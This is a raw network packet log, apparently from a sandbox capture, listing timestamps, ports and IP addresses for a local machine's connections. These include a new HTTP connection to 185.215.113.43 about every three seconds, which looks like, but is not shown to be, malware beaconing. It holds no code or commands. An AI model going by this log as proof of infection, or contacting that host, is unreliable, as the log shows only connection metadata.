Nov 21, 2024 22:13:15.000634909 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.000643015 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.000660896 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.039606094 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.039666891 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.039680004 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.039693117 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.039721966 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.082798958 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.082807064 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.175894022 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.175919056 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.175942898 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.175966024 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.175980091 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.176017046 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.178791046 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.178813934 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.178857088 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.178857088 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.178877115 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.178904057 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.178911924 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.178935051 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.181281090 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.181307077 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.181314945 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.181330919 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.181340933 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.181349993 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.181366920 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.181399107 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.182122946 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.182216883 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.182223082 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.182245970 CET	443	50013	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:15.182261944 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.182293892 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:15.689629078 CET	443	50041	13.91.222.61	192.168.2.5
Nov 21, 2024 22:13:15.738806009 CET	50041	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:15.921036005 CET	50033	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:15.921305895 CET	50046	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:16.042260885 CET	80	50046	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:16.042594910 CET	80	50033	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:16.043103933 CET	50033	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:16.043171883 CET	50046	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:16.047354937 CET	50046	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:16.166873932 CET	80	50046	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:17.390492916 CET	80	50046	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:17.390604019 CET	50046	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:19.013130903 CET	50046	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:19.013828993 CET	50053	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:19.133099079 CET	80	50046	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:19.133440018 CET	80	50053	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:19.133558035 CET	50053	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:19.133560896 CET	50046	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:19.133815050 CET	50053	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:19.253353119 CET	80	50053	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:20.571755886 CET	80	50053	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:20.572067022 CET	50053	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:21.814426899 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:21.814426899 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:21.814512014 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:21.814527035 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:22.087846994 CET	50053	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:22.088146925 CET	50059	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:22.208863974 CET	80	50059	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:22.208981991 CET	50059	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:22.209006071 CET	80	50053	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:22.209224939 CET	50053	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:22.216917038 CET	50059	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:22.336664915 CET	80	50059	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:22.949583054 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:22.949667931 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:22.949806929 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:23.025988102 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.026179075 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.026283979 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:23.263968945 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.264034986 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.264143944 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:23.272833109 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.272914886 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.272986889 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:23.299128056 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.299300909 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.299407959 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:23.310851097 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.310918093 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:23.310987949 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:23.554280043 CET	80	50059	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:23.557490110 CET	50059	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:25.169558048 CET	50059	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:25.169858932 CET	50070	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:25.295108080 CET	80	50070	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:25.295195103 CET	50070	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:25.295269012 CET	80	50059	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:25.295483112 CET	50070	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:25.295588017 CET	50059	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:25.414908886 CET	80	50070	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:25.939173937 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:25.939227104 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:25.941272974 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:25.976933956 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:25.977003098 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:25.977067947 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:26.627410889 CET	80	50070	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:26.627619982 CET	50070	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:28.143053055 CET	50070	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:28.143357992 CET	50073	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:28.262885094 CET	80	50073	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:28.262949944 CET	80	50070	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:28.262989998 CET	50073	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:28.263015985 CET	50070	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:28.263384104 CET	50073	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:28.385205030 CET	80	50073	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:29.039386988 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:29.039480925 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:29.039557934 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:29.654611111 CET	80	50073	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:29.655150890 CET	50073	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:31.294922113 CET	50073	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:31.295334101 CET	50075	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:31.414911985 CET	80	50073	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:31.414932966 CET	80	50075	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:31.415107012 CET	50073	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:31.415364981 CET	50075	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:31.415364981 CET	50075	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:31.490315914 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:31.490459919 CET	443	50024	23.57.90.111	192.168.2.5
Nov 21, 2024 22:13:31.490520000 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:31.491647005 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:31.491857052 CET	443	50018	104.126.116.81	192.168.2.5
Nov 21, 2024 22:13:31.491916895 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:31.534924984 CET	80	50075	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:31.544951916 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:31.545032024 CET	443	50022	104.126.116.83	192.168.2.5
Nov 21, 2024 22:13:31.545090914 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:31.546092987 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:31.546291113 CET	443	50019	23.44.203.17	192.168.2.5
Nov 21, 2024 22:13:31.546344995 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:32.802968979 CET	80	50075	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:32.803138971 CET	50075	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:34.309515953 CET	50075	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:34.309830904 CET	50077	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:34.429378986 CET	80	50077	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:34.429402113 CET	80	50075	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:34.429480076 CET	50075	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:34.429488897 CET	50077	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:34.430207014 CET	50077	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:34.549738884 CET	80	50077	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:35.911736965 CET	80	50077	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:35.915134907 CET	50077	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:37.536967993 CET	50077	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:37.537262917 CET	50079	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:37.656935930 CET	80	50079	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:37.657068014 CET	80	50077	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:37.657176018 CET	50077	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:37.657274961 CET	50079	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:37.657495975 CET	50079	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:37.777105093 CET	80	50079	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:38.401882887 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.401911974 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.401972055 CET	50018	443	192.168.2.5	104.126.116.81
Nov 21, 2024 22:13:38.401972055 CET	50020	443	192.168.2.5	20.110.205.119
Nov 21, 2024 22:13:38.402057886 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.402095079 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:38.402128935 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.402153969 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.402195930 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.402245045 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.402462959 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:38.402580023 CET	50013	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:38.402704000 CET	50019	443	192.168.2.5	23.44.203.17
Nov 21, 2024 22:13:38.402837038 CET	50031	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:38.402859926 CET	50022	443	192.168.2.5	104.126.116.83
Nov 21, 2024 22:13:38.402879953 CET	50023	443	192.168.2.5	18.238.49.99
Nov 21, 2024 22:13:38.402923107 CET	50024	443	192.168.2.5	23.57.90.111
Nov 21, 2024 22:13:38.402975082 CET	50041	443	192.168.2.5	13.91.222.61
Nov 21, 2024 22:13:39.048274040 CET	80	50079	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:39.049319029 CET	50079	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:40.563724041 CET	50079	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:40.564337015 CET	50081	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:40.683700085 CET	80	50079	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:40.683846951 CET	80	50081	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:40.683943033 CET	50079	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:40.683950901 CET	50081	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:40.685340881 CET	50081	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:40.804842949 CET	80	50081	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:42.081556082 CET	80	50081	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:42.083110094 CET	50081	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:43.692997932 CET	50081	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:43.693344116 CET	50082	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:43.812887907 CET	80	50082	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:43.812968016 CET	80	50081	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:43.813025951 CET	50082	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:43.813045025 CET	50081	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:43.813352108 CET	50082	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:43.932900906 CET	80	50082	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:45.190100908 CET	80	50082	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:45.190197945 CET	50082	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:46.708004951 CET	50082	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:46.708333015 CET	50083	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:46.828054905 CET	80	50083	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:46.828206062 CET	80	50082	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:46.828418016 CET	50082	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:46.828730106 CET	50083	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:46.828730106 CET	50083	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:46.948812962 CET	80	50083	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:48.176667929 CET	80	50083	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:48.176772118 CET	50083	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:49.817480087 CET	50083	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:49.817888021 CET	50085	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:49.937690020 CET	80	50085	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:49.937753916 CET	80	50083	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:49.937835932 CET	50083	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:49.937849998 CET	50085	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:49.953932047 CET	50085	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:50.073574066 CET	80	50085	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:51.315826893 CET	80	50085	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:51.317445993 CET	50085	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:52.832820892 CET	50085	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:52.833496094 CET	50087	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:52.952918053 CET	80	50085	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:52.953090906 CET	50085	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:52.953109026 CET	80	50087	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:52.953397036 CET	50087	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:52.953731060 CET	50087	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:53.073185921 CET	80	50087	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:54.389008045 CET	80	50087	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:54.391181946 CET	50087	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:54.704343081 CET	50087	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:54.824318886 CET	80	50087	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:54.824397087 CET	50087	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:56.019737005 CET	50090	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:56.139349937 CET	80	50090	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:56.141110897 CET	50090	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:56.141918898 CET	50090	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:56.261576891 CET	80	50090	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:57.583847046 CET	80	50090	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:57.583920956 CET	50090	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:59.098686934 CET	50090	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:59.098994970 CET	50092	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:59.218583107 CET	80	50092	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:59.218622923 CET	80	50090	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:59.218662977 CET	50092	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:59.218688965 CET	50090	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:59.220616102 CET	50092	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:59.340210915 CET	80	50092	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:00.610451937 CET	80	50092	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:00.611143112 CET	50092	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:02.238465071 CET	50092	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:02.238796949 CET	50094	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:02.358347893 CET	80	50094	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:02.358407021 CET	80	50092	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:02.358428001 CET	50094	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:02.358454943 CET	50092	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:02.358969927 CET	50094	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:02.478398085 CET	80	50094	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:03.745052099 CET	80	50094	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:03.745259047 CET	50094	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:05.257697105 CET	50094	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:05.258249998 CET	50096	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:05.377818108 CET	80	50094	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:05.377851009 CET	80	50096	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:05.378079891 CET	50096	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:05.378079891 CET	50094	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:05.378355026 CET	50096	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:05.497842073 CET	80	50096	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:06.770081997 CET	80	50096	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:06.770158052 CET	50096	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:08.395407915 CET	50096	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:08.395796061 CET	50098	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:08.515292883 CET	80	50098	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:08.515404940 CET	50098	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:08.515453100 CET	80	50096	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:08.515659094 CET	50096	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:08.515795946 CET	50098	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:08.636502981 CET	80	50098	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:09.905498981 CET	80	50098	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:09.907896042 CET	50098	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:11.426192999 CET	50098	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:11.426563025 CET	50101	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:11.545994043 CET	80	50098	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:11.546065092 CET	80	50101	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:11.546116114 CET	50098	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:11.546232939 CET	50101	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:11.546442032 CET	50101	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:11.666110992 CET	80	50101	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:12.929306984 CET	80	50101	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:12.929394960 CET	50101	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:14.550789118 CET	50101	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:14.551234961 CET	50103	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:14.671384096 CET	80	50101	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:14.671462059 CET	50101	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:14.671494007 CET	80	50103	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:14.671660900 CET	50103	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:14.671928883 CET	50103	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:14.791344881 CET	80	50103	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:16.095777988 CET	80	50103	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:16.095834017 CET	50103	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:17.614021063 CET	50103	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:17.614401102 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:17.734155893 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:17.734205008 CET	80	50103	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:17.734262943 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:17.734287024 CET	50103	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:17.734579086 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:17.854036093 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:19.123548985 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:19.125653982 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:20.755491972 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:20.756031990 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:20.875513077 CET	80	50105	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:20.875581980 CET	50105	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:20.875617981 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:20.875695944 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:20.875996113 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:20.995466948 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:22.218266964 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:22.218338013 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:23.723136902 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:23.723661900 CET	50110	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:23.843190908 CET	80	50110	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:23.843257904 CET	80	50108	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:23.843272924 CET	50110	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:23.843319893 CET	50108	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:23.843540907 CET	50110	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:23.963032961 CET	80	50110	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:25.291801929 CET	80	50110	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:25.291893959 CET	50110	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:26.925710917 CET	50110	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:26.931174040 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:27.045538902 CET	80	50110	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:27.049424887 CET	50110	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:27.050797939 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:27.050950050 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:27.055140972 CET	50112	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:14:27.174638987 CET	80	50112	185.215.113.43	192.168.2.5
Nov 21, 2024 22:14:28.474555016 CET	80	50112	185.215.113.43	192.168.2.5
